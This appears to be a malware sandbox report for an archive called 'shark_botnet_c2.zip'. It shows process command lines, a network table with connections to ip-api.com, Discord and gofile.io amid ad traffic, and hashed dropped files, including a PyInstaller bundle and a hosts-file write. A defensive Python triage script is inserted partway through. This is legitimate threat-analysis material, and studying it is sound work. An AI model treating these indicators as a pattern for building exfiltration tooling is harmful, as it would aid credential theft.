"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6428,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10892 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=7608,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7576 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=11568,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11460 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=11532,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3520 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=11552,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10380 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=11572,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11632 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=11588,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10112 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=11604,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9596 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --field-trial-handle=11628,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9572 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --field-trial-handle=11644,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=9196 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x2d0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=7688,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3496 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=3560,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10420 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --field-trial-handle=6036,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7728 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6020,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10544 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=10552,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10500 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --field-trial-handle=10112,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6056 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=11664,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=10180 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=10456,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=11308 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3496,i,9316220273430501707,13583776016725680164,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3368 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sharksecurity.vercel.app | udp |
| US | 76.76.21.241:443 | sharksecurity.vercel.app | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 241.21.76.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.135.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| FR | 51.178.195.208:443 | euw2.smartadserver.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | sync.search.spotxchange.com | udp |
| NL | 89.149.193.105:443 | rtb-csync.smartadserver.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| NL | 154.57.158.115:443 | ads.stickyadstv.com | tcp |
| US | 8.8.8.8:53 | 1f2e7.v.fwmrm.net | udp |
| DE | 3.69.181.172:443 | 1f2e7.v.fwmrm.net | tcp |
| IE | 54.155.111.174:443 | match.prod.bidr.io | tcp |
| DE | 37.252.171.52:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | 172.181.69.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | image8.pubmatic.com | udp |
| GB | 185.64.191.214:443 | image8.pubmatic.com | tcp |
| US | 8.8.8.8:53 | pm.w55c.net | udp |
| IE | 34.249.168.140:443 | pm.w55c.net | tcp |
| US | 8.8.8.8:53 | sync.ipredictive.com | udp |
| US | 52.0.8.114:443 | sync.ipredictive.com | tcp |
| US | 8.8.8.8:53 | 214.191.64.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.168.249.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.8.0.52.in-addr.arpa | udp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 104.26.6.193:443 | www.ezyzip.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 3.213.58.216.in-addr.arpa | udp |
| FR | 51.178.195.208:443 | euw2.smartadserver.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 216.58.201.110:443 | apis.google.com | udp |
| GB | 142.250.200.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1844.casalemedia.com | udp |
| CA | 85.91.47.115:443 | a1844.casalemedia.com | tcp |
| GB | 172.217.16.230:443 | s0.2mdn.net | udp |
| NL | 89.149.192.196:443 | ssbsync.smartadserver.com | tcp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | sync.adotmob.com | udp |
| US | 8.8.8.8:53 | casale-match.dotomi.com | udp |
| US | 172.64.150.63:443 | a.tribalfusion.com | udp |
| NL | 185.89.210.141:443 | secure.adnxs.com | tcp |
| FR | 45.137.176.88:443 | sync.adotmob.com | tcp |
| US | 172.64.149.180:443 | js-sec.indexww.com | tcp |
| NL | 63.215.202.169:443 | casale-match.dotomi.com | tcp |
| US | 8.8.8.8:53 | 115.47.91.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.176.137.45.in-addr.arpa | udp |
| GB | 142.250.200.33:443 | tpc.googlesyndication.com | udp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | udp |
| US | 104.18.36.155:443 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | dsum.casalemedia.com | udp |
| US | 8.8.8.8:53 | 169.202.215.63.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.149.64.172.in-addr.arpa | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | dt.adsafeprotected.com | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| FR | 51.178.195.208:443 | euw2.smartadserver.com | tcp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| US | 104.26.6.193:443 | www.ezyzip.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | cdn.doubleverify.com | udp |
| GB | 2.18.190.133:443 | cdn.doubleverify.com | tcp |
| GB | 142.250.179.226:443 | googleads4.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | rtb0.doubleverify.com | udp |
| US | 130.211.44.5:443 | rtb0.doubleverify.com | tcp |
| US | 8.8.8.8:53 | tps.doubleverify.com | udp |
| US | 130.211.44.5:443 | tps.doubleverify.com | tcp |
| US | 8.8.8.8:53 | 4.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.44.211.130.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rtbc-ew1.doubleverify.com | udp |
| US | 8.8.8.8:53 | tpsc-ew1.doubleverify.com | udp |
| US | 130.211.44.5:443 | tpsc-ew1.doubleverify.com | tcp |
| US | 130.211.44.5:443 | tpsc-ew1.doubleverify.com | tcp |
| US | 130.211.44.5:443 | tpsc-ew1.doubleverify.com | tcp |
| US | 130.211.44.5:443 | tpsc-ew1.doubleverify.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| FR | 51.178.195.208:443 | euw2.smartadserver.com | tcp |
| US | 130.211.44.5:443 | tpsc-ew1.doubleverify.com | tcp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | google.com | udp |
| GB | 216.58.213.3:443 | beacons.gcp.gvt2.com | udp |
| FR | 51.178.195.208:443 | euw2.smartadserver.com | tcp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| GB | 172.217.16.230:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| GB | 142.250.187.194:443 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 194.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prg-apac.smartadserver.com | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| US | 8.8.8.8:53 | prebid.a-mo.net | udp |
| US | 79.127.243.248:443 | ssc.33across.com | tcp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| NL | 185.89.210.244:443 | ib.adnxs.com | tcp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | aax.amazon-adsystem.com | udp |
| NL | 89.149.193.81:443 | prg-apac.smartadserver.com | tcp |
| US | 8.8.8.8:53 | | udp |
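The connection table above and the Files list that follows are raw sandbox output. The first thing an analyst does with them is strip the resolver traffic out of the network rows (the `8.8.8.8:53` queries and the `*.in-addr.arpa` reverse lookups are the sandbox resolving what the sample contacted, not endpoints) and sort the dropped files by what produced them, because most of this list is the browser and PowerShell maintaining their own state. The Python below is an added example, not code from this report or from the sandbox vendor's tooling. It parses the two row shapes the page prints and applies those checks; the bucket names and the path patterns used to recognise PowerShell's `Add-Type` compile directory are the example's own assumptions, and `SAMPLE` is a short excerpt copied from the report on this page.

```python
"""Triage helpers for a sandbox report in the format shown on this page.

Added example: not code from the report or from the sandbox vendor. It parses
connection rows ("| CC | ip:port | host | proto |") and dropped-file entries
(a path line followed by "| MD5 | ... |" hash rows). SAMPLE is an excerpt of
the report above; the bucket names and path rules are this example's own."""
import re
from collections import Counter

SAMPLE = r"""
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
| NL | 178.250.1.56:443 | bidder.criteo.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI35202\python311.dll
| SHA256 | 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0 |
\??\pipe\LOCAL\crashpad_408_MSALPTCWMYIIPXUJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
C:\Windows\system32\drivers\etc\hosts
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
\??\c:\Users\Admin\AppData\Local\Temp\omjkrhd1\omjkrhd1.0.cs
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
memory/5104-109-0x00007FFDBB2D0000-0x00007FFDBB8BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| SHA256 | e2a77a4f3ecced148627771d3e7eac3b093b95723ded7dca5b87760db2019f5c |
"""

NET_ROW = re.compile(r"^\|\s*([A-Z]{2})\s*\|\s*([\d.]+):(\d+)\s*\|\s*(\S+)\s*\|\s*(tcp|udp)\s*\|$")
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")
# Digests of the zero-length file: a "dropped file" with these carries no content.
EMPTY = {"d41d8cd98f00b204e9800998ecf8427e",
         "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"}

def network_summary(lines):
    """Count connections per (host, ip, proto), dropping resolver rows
    (port 53) and PTR names, which are sandbox DNS activity, not endpoints."""
    counts = Counter()
    for line in lines:
        m = NET_ROW.match(line.strip())
        if not m:
            continue
        _cc, ip, port, host, proto = m.groups()
        if port == "53" or host.endswith(".in-addr.arpa"):
            continue
        counts[(host, ip, proto)] += 1
    return counts

def parse_files(lines):
    """One dict per dropped-file entry: its path plus the digests listed under it.
    A path line is any non-table line containing a backslash, which skips the
    'Files' heading and the memory/*.dmp lines interleaved with the entries."""
    records, current = [], None
    for line in lines:
        line = line.strip()
        m = HASH_ROW.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
        elif "\\" in line and not line.startswith("|"):
            current = {"path": line}
            records.append(current)
    return records

def classify(rec):
    """Bucket a dropped file by what produced it (rules are this example's own)."""
    p = rec["path"].lower()
    if rec.get("md5") in EMPTY or rec.get("sha256") in EMPTY:
        return "empty-content"            # e.g. the crashpad named pipe
    if p.endswith("\\drivers\\etc\\hosts"):
        return "hosts-file-write"         # the write behind "Drops file in Drivers directory"
    if re.search(r"\\_mei\d+\\", p):
        return "pyinstaller-runtime"      # PyInstaller onefile extraction dir (python311.dll, *.pyd)
    if re.search(r"\\temp\\[a-z0-9]{8}\\", p) or re.search(r"\\temp\\res[0-9a-f]{4}\.tmp$", p):
        return "powershell-add-type"      # csc.exe compiling inline C#: *.cmdline, *.0.cs, *.dll, RES*.tmp
    if "__psscriptpolicytest_" in p:
        return "powershell-policy-probe"  # written at every PowerShell start to test AppLocker/WDAC policy
    if "\\user data\\" in p:
        return "browser-profile"          # Edge/Chrome maintaining their own profiles
    return "other"

def triage(lines):
    """Map bucket name -> list of paths, in report order."""
    buckets = {}
    for rec in parse_files(lines):
        buckets.setdefault(classify(rec), []).append(rec["path"])
    return buckets

def candidate_hashes(lines, skip=("empty-content", "browser-profile", "powershell-policy-probe")):
    """SHA256 digests that deserve a second look; sandbox-generated noise is excluded."""
    return sorted({r["sha256"] for r in parse_files(lines)
                   if "sha256" in r and classify(r) not in skip})

if __name__ == "__main__":
    rows = SAMPLE.splitlines()
    for key, n in network_summary(rows).most_common():
        print(n, *key)
    for bucket, paths in triage(rows).items():
        print(bucket, paths)
    print(candidate_hashes(rows))
```

Run over the whole page rather than the excerpt, the same code makes the shape of this detonation visible: the `_MEI35202` directory is PyInstaller's onefile extraction location, so the dropped executable is a PyInstaller bundle whose Python payload lives in the executable's embedded archive rather than in this file list, and the same directory holds `rar.exe` with its `rarreg.key`. On the network side, the `api.gofile.io` and `store*.gofile.io` connections (a file-hosting service) sit among ad-network traffic of the kind a browser session produces; the Edge and Chrome profile writes in the Files list show a browser was active in the sandbox. The `udp` rows to port 443 are QUIC, not an anomaly. Rows the regexes cannot match, such as the last connection row above with its missing host column, are skipped rather than guessed at.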
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 61cef8e38cd95bf003f5fdd1dc37dae1 |
| SHA1 | 11f2f79ecb349344c143eea9a0fed41891a3467f |
| SHA256 | ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e |
| SHA512 | 6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d |
\??\pipe\LOCAL\crashpad_408_MSALPTCWMYIIPXUJ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0a9dc42e4013fc47438e96d24beb8eff |
| SHA1 | 806ab26d7eae031a58484188a7eb1adab06457fc |
| SHA256 | 58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151 |
| SHA512 | 868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | eab85e347692dc1ca0f13219035e7d2d |
| SHA1 | 8b5ecdf2014c411625bbb6b3c7c7878e42d3c4bc |
| SHA256 | 18ca1094bfdbad5680a8f69dffc4fdc6b6b53483320e7dbd019089cfefc3893b |
| SHA512 | 9806695e56b88e9e7373d3de8623e09ed5eadafd08652fcab813ec5a333c506dcd85c54261a3b43816d0cb45b2d18f415c5cdc3c4cfa7a5a42f9b6e727c1325b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\Downloads\shark_botnet_c2.zip
| MD5 | bf52fb2803cc805f797b2f00ceb4260d |
| SHA1 | 6724edfefaaa0ac387d6f7bfae9ad6280eb6908a |
| SHA256 | ba9ada271c0e3bb2c53762c41a19f414811f8b3079e107adbb64edbed4b45b53 |
| SHA512 | 396880f658cb8b7289332db46b88a89a89dd3613295b5fb6919a1919607438b70054a2909cebf5f9f563485701f3176ecf4de6c7da728d4eba5775bdb06573c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4249609dc4ea210fff8596fa39922d9a |
| SHA1 | 0328fe52180096dd2ce233905b073750d25a9cd8 |
| SHA256 | e2a77a4f3ecced148627771d3e7eac3b093b95723ded7dca5b87760db2019f5c |
| SHA512 | 26eb382df7768a00409be20ca8b1a2b1f3bd54818a0a8a2ce2db3709b9d97049cfb9bfa015d20c24a792abc9731dcda8791dec9a28857cdae2390f7517188f72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6ef94ccf18f4749e710f87de474f69cc |
| SHA1 | 2518b5068e6f7cc50cd3cd5905876e843ffbb2eb |
| SHA256 | 168619ced24794084b561d6a1ca3e5c8fb799caef2caebee20e9bede43b08bff |
| SHA512 | 387c729aa116c8b85ce4fa09b683e5e535d8265a46a3a3d49ce2d4a459363bfe320362cf5c34a6c44dff27db119378d799645fc555d9b6e8d994e713426eae72 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 444d2aa6281060c3c186f64f5fdeebd1 |
| SHA1 | 1fa91978418957dc4e221f5e4d83ff9933d1cb2e |
| SHA256 | 07eec0fdba9592e47a0795cc01fdee20216be7a9166b2d4ec22eb6fd3cf0f49a |
| SHA512 | 720905ea85b98077079007f8410da80b103abe97394fc4d07e835c3adb750770ea71ee8d5cdbb4f8b7589856314bde9ac95c7ac8ce9d4338e9a890de7a490107 |
C:\Users\Admin\AppData\Local\Temp\_MEI35202\python311.dll
| MD5 | 1e76961ca11f929e4213fca8272d0194 |
| SHA1 | e52763b7ba970c3b14554065f8c2404112f53596 |
| SHA256 | 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0 |
| SHA512 | ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b |
C:\Users\Admin\AppData\Local\Temp\_MEI35202\VCRUNTIME140.dll
| MD5 | 870fea4e961e2fbd00110d3783e529be |
| SHA1 | a948e65c6f73d7da4ffde4e8533c098a00cc7311 |
| SHA256 | 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644 |
| SHA512 | 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88 |
memory/5104-109-0x00007FFDBB2D0000-0x00007FFDBB8BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI35202\base_library.zip
| MD5 | 2efeab81308c47666dfffc980b9fe559 |
| SHA1 | 8fbb7bbdb97e888220df45cc5732595961dbe067 |
| SHA256 | a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad |
| SHA512 | 39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c |
C:\Users\Admin\AppData\Local\Temp\_MEI35202\_ctypes.pyd
| MD5 | 7ecc651b0bcf9b93747a710d67f6c457 |
| SHA1 | ebb6dcd3998af9fff869184017f2106d7a9c18f3 |
| SHA256 | b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a |
| SHA512 | 1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5 |
C:\Users\Admin\AppData\Local\Temp\_MEI35202\libffi-8.dll
| MD5 | 87786718f8c46d4b870f46bcb9df7499 |
| SHA1 | a63098aabe72a3ed58def0b59f5671f2fd58650b |
| SHA256 | 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33 |
